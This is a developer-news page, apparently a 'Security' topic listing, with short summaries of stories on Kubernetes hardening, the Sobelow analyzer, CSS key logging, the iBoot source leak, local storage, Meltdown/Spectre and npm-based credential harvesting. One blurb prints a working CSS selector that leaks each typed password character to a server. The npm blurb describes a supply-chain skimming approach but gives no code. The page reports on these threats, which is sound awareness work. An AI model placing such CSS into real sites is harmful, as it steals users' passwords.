Security Icon

Security

InfoSec, DevSec, Penetration Testing, etc.
24 Stories
All Topics

Kubernetes Icon github.com

A best practice guide to Kubernetes security

K8s is a powerful platform which can be abused in many ways if not configured properly. Contributors to this guide are running Kubernetes in production and worked on several K8s projects to learn about security flaws the hard way. This guide scores major points for having battle-hardened contributors. I also dig how they indicate the severity/importance of each topic with an emoji. Look out for the 💥s!

read more...

Griffin Byatt github.com

Sobelow – a security-focused static analyzer for the Phoenix framework

Yesterday, Griffin Byatt hit me up in Slack and let me know we had a few security holes. 😱 After a quick discussion about the magnitude of said holes, he informed me that he'd found them by running our code through his static analysis tool, Sobelow. Say what? For security researchers, it is a useful tool for getting a quick view of points-of-interest. For project maintainers, it can be used to prevent the introduction of a number of common vulnerabilities. I asked Griffin if he'd be kind enough to open a PR with the fixes so we can link it up and use it to show folks how handy this tool is. So that's what he did and that's what I'm doing! 💚

read more...

Security Icon jakearchibald.com

Third party CSS is not safe

Jake Archibald goes much deeper on our previous report of CSS key logging. Some folks called for browsers to 'fix' it. Some folks dug a bit deeper and saw that it only affected sites built in React-like frameworks, and pointed the finger at React. But the real problem is thinking that third party content is 'safe'. Jake shared many examples as well as ways to mitigate these types of attacks.

read more...

Security Icon github.com

CSS key logging is a thing?! 😱

Turns out it definitely can be, as long as you are using a component-style JavaScript tool (such as React) that updates input values on every keypress. Here's how it works: Utilizing CSS attribute selectors, one can request resources from an external server under the premise of loading a background-image. Add some CSS that looks like this: input[type="password"][value$="a"] { background-image: url("http://localhost:3000/a"); } When the user types an a in to the password field, it will hit your server for logging. Dastardly!

read more...

iOS Icon motherboard.vice.com

Someone published the source code to iBoot (a critical piece of iOS) on GitHub

This is being called "the biggest leak in history", which is probably not true (remember when Gizmodo got its grubby paws on the iPhone 4?). But it's likely the biggest leak in Apple software history. Motherboard says it... could pave the way for hackers and security researchers to find vulnerabilities in iOS and make iPhone jailbreaks easier to achieve. That's plausible. iBoot is responsible for ensuring a trusted boot of the O/S. The specific version posted was from iOS 9, but this portion of code probably doesn't get updated as often as the Music app, so it's likely still relevant. Apple promptly posted a DMCA takedown request, and the source code is no longer publicly available. But we developers know all to well that once source code is made public, there's no taking it private again.

read more...

Security Icon www.rdegges.com

Please stop using Local Storage

Randall Degges examines the good and bad uses of Local Storage. tldr, don't use it to store sensitive data. Almost every day I stumble across a new website storing sensitive user information in local storage and it bothers me to know that so many developers are opening themselves up to catastrophic security issues by doing so. Let’s have a heart-to-heart and talk about local storage and why you should stop using it to store session data.

read more...

Medium Icon Medium

Meltdown and Spectre Explained

If some or most of what you've heard or read about Meltdown and Spectre has gone over your head, then you should 💯 read this technical explainer from Matt Klein (also known for being the creator of Envoy). Matt: I have not seen a good mid-level introduction to the vulnerabilities and mitigations. In this post I’m going to attempt to correct that by providing a gentle introduction to the hardware and software background required to understand the vulnerabilities, a discussion of the vulnerabilities themselves, as well as a discussion of the current mitigations. Matt goes on to share graphic charts of CPUs, virtual memory, and code samples to breakdown the exploit.

read more...

Security Icon spectreattack.com

Meltdown and Spectre

Everything you need to know about the Meltdown and Spectre bug. Q: Am I affected by the bug? A: Most certainly, yes. Q: Can I detect if someone has exploited Meltdown or Spectre against me? A: Probably not. The exploitation does not leave any traces in traditional log files. Q: Which systems are affected by Meltdown? A: Desktop, Laptop, and Cloud computers may be affected by Meltdown. More technically, every Intel processor which implements out-of-order execution is potentially affected, which is effectively every processor since 1995. Uh oh. 😱

read more...

Hackernoon Icon Hackernoon

I'm harvesting credit card numbers and passwords from your site. Here's how.

This is pretty scary regardless if it's based on a true story or not. When I first wrote this code back in 2015, it was of no use at all sitting on my computer. I needed to get it out into the world. Out into your site. Lucky for me, we live in an age where people install npm packages like they’re popping pain killers. So, npm was to be my distribution method. I would need to come up with some borderline-useful package that people would install without thinking — my Trojan horse. Oh and then there was this — this is an excellent opportunity for taking over npm packages and injecting malware by malicious people.

read more...
0:00 / 0:00